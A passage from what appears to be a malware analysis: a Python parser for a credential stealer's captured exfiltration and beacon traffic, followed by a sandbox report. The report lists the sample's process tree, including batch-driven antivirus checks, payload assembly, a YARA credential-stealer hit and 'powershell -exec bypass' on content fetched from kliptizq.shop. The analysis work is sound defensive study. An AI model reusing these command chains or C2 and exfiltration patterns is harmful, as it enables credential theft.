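    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "  # form-data; name="hwid"
    "45 33 36 35 44 35 35 32 32 43 34 41 42 36 31 30 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a "
    "2d 2d 46 47 54 41 34 46 36 47 51 4b 5a 58 57 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "
    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a "  # name="pid" -> 1
    "2d 2d 46 47 54 41 34 46 36 47 51 4b 5a 58 57 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "
    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a "  # name="lid"
    "68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a "                                    # hRjzG3--VIKA CRLF
    "2d 2d 46 47 54 41 34 46 36 47 51 4b 5a 58"                                     # truncated in the report
)

# Second OUT record (Content-Length: 113), copied from the "Data Ascii" line.
API_BODY = (
    "act=get_message&ver=4.0&lid=hRjzG3--VIKA"
    "&j=637b55279021aab33278188cfa638397&hwid=E365D5522C4AB610165F70E3262EAA47"
)

# The two IN records of the reply: one 0xd4-byte chunk, then the last-chunk marker.
CHUNKED_REPLY = (
    b"d4\r\n"
    b"qYET9icmXnYxJtiqpWmIXkmIfXyvQTb5lyS1udN1fTXy+jGDBRx8HkVSqNmfNacCZuYYDcZvRZH4VOmWoBEaX9D0Z6oIVi0eH1Kg"
    b"3odFqjg9qkdOg2NT260VyJWoVwgXk6N7glNWLUxtCYSFzgXhLj3hBw2BMl6W53ia0L0BIlbF8UyaQ1QBBVlH9t7dHapya+4JXpVzGtvyBo+Irig="
    b"\r\n"
    b"0\r\n\r\n"
)


def hexdump_to_bytes(text: str) -> bytes:
    """Turn a report-style 'Data Raw' string ("2d 2d 46 ...") into bytes."""
    return bytes.fromhex(text)


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Extract name -> value from a multipart/form-data body.
    Tolerates the truncated closing boundary that the report's dump ends with."""
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim):
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:                                   # preamble, trailing "--", no header block
            continue
        m = re.search(rb'name="([^"]+)"', head)
        if not m:
            continue
        value = value.split(b"\r\n--", 1)[0]          # cut off a truncated boundary fragment
        if value.endswith(b"\r\n"):                   # CRLF that precedes the next delimiter
            value = value[:-2]
        fields[m.group(1).decode()] = value
    return fields


def parse_api_beacon(body: str) -> dict:
    """Parse the x-www-form-urlencoded POST /api body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, strict_parsing=True).items()}


def dechunk(stream: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body (hex chunk-size, CRLF-framed)."""
    out, pos = b"", 0
    while True:
        eol = stream.index(b"\r\n", pos)
        size = int(stream[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return out                                   # last-chunk; trailers ignored
        start = eol + 2
        out += stream[start:start + size]
        pos = start + size + 2                           # skip the CRLF after the data


def beacon_kind(fields):
    """Label a request by the field set seen in THIS capture (assumption, not a signature)."""
    names = set(fields)
    if names >= {"hwid", "pid", "lid"}:
        return "upload"                 # multipart POST: hwid/pid/lid followed by binary parts
    if names == {"act", "ver", "lid", "j", "hwid"}:
        return "get_message"            # act=get_message beacon
    return None


def correlate() -> dict:
    """Run the captured exchange through the parsers and return the analyst's checks."""
    upload = parse_multipart(hexdump_to_bytes(MULTIPART_HEX), BOUNDARY)
    api = parse_api_beacon(API_BODY)
    reply = base64.b64decode(dechunk(CHUNKED_REPLY), validate=True)
    return {
        "upload_fields": {k: v.decode() for k, v in upload.items()},
        "upload_kind": beacon_kind(upload),
        "api_fields": api,
        "api_kind": beacon_kind(api),
        "api_content_length": len(API_BODY.encode()),      # must match the header's 113
        "same_host": upload["hwid"].decode() == api["hwid"]
                     and upload["lid"].decode() == api["lid"],
        "reply_bytes": len(reply),                         # opaque blob; not interpreted here
    }


if __name__ == "__main__":
    for key, val in correlate().items():
        print(f"{key}: {val}")
```

Two things fall out of running it that a detection engineer can use without knowing the server side: the hwid and lid pairs in the upload and in the get_message beacon are identical, so either value pivots between the bulk exfiltration session and the lightweight beacon, and the upload's first 255 bytes are plain ASCII multipart headers even though the rest of the 557508-byte body is not, which is why the hwid/pid/lid part names are visible in the report's first dump but none of the later ones.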


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49846 | 172.67.191.144 | 443 | 6380 | C:\Users\user\AppData\Local\Temp\124531\Designing.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:29:17 UTC | 207 | OUT | GET /int_clp_ldr_sha.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: kliptizq.shop
2024-12-22 22:29:18 UTC | 548 | IN | HTTP/1.1 403 Forbidden
Date: Sun, 22 Dec 2024 22:29:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SgdMo%2FlmiMzguYF8JZyhNWcTi89c88o1%2Bxx3atAqJuRbSNIAUJ3foY4pQ7w8AnjSO7rsN4Tps3gOs3BUEyHqAQQ7z6Ss0U8XRvTOlGWW%2B3PRN98EcFEj73DLNHJJMpRX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f638cc2ab095e5f-EWR
                                                                                                                                                                            2024-12-22 22:29:18 UTC821INData Raw: 31 31 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                            Data Ascii: 11d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                            2024-12-22 22:29:18 UTC1369INData Raw: 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d
                                                                                                                                                                            Data Ascii: errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-
                                                                                                                                                                            2024-12-22 22:29:18 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63
                                                                                                                                                                            Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-c
                                                                                                                                                                            2024-12-22 22:29:18 UTC1013INData Raw: 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e
                                                                                                                                                                            Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span
                                                                                                                                                                            2024-12-22 22:29:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0



                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:17:28:06
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:73'409'776 bytes
                                                                                                                                                                            MD5 hash:7A2ED58357C7DC7A63754E88AF43A860
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:2
                                                                                                                                                                            Start time:17:28:07
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd
                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:17:28:07
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:17:28:09
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                            Imagebase:0xd80000
                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:5
                                                                                                                                                                            Start time:17:28:09
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                            Imagebase:0x1000000
                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:6
                                                                                                                                                                            Start time:17:28:09
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                            Imagebase:0xd80000
                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:7
                                                                                                                                                                            Start time:17:28:09
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                            Imagebase:0x1000000
                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:8
                                                                                                                                                                            Start time:17:28:10
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:cmd /c md 124531
                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:9
                                                                                                                                                                            Start time:17:28:10
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:extrac32 /Y /E Lt
                                                                                                                                                                            Imagebase:0xb30000
                                                                                                                                                                            File size:29'184 bytes
                                                                                                                                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:10
                                                                                                                                                                            Start time:17:28:10
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "Heater" Lance
Imagebase:0x1000000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:17:28:11
Start date:22/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough z
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:17:28:11
Start date:22/12/2024
Path:C:\Users\user\AppData\Local\Temp\124531\Designing.com
Wow64 process (32bit):true
Commandline:Designing.com z
Imagebase:0xda0000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2535381458.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:13
Start time:17:28:11
Start date:22/12/2024
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0xec0000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:17:29:17
Start date:22/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f638cc2ab095e5f</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- /#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html>
Imagebase:0xe00000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:17:29:17
Start date:22/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Execution Graph

Execution Coverage:17.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21%
Total number of Nodes:1482
Total number of Limit Nodes:27
4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 
4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API 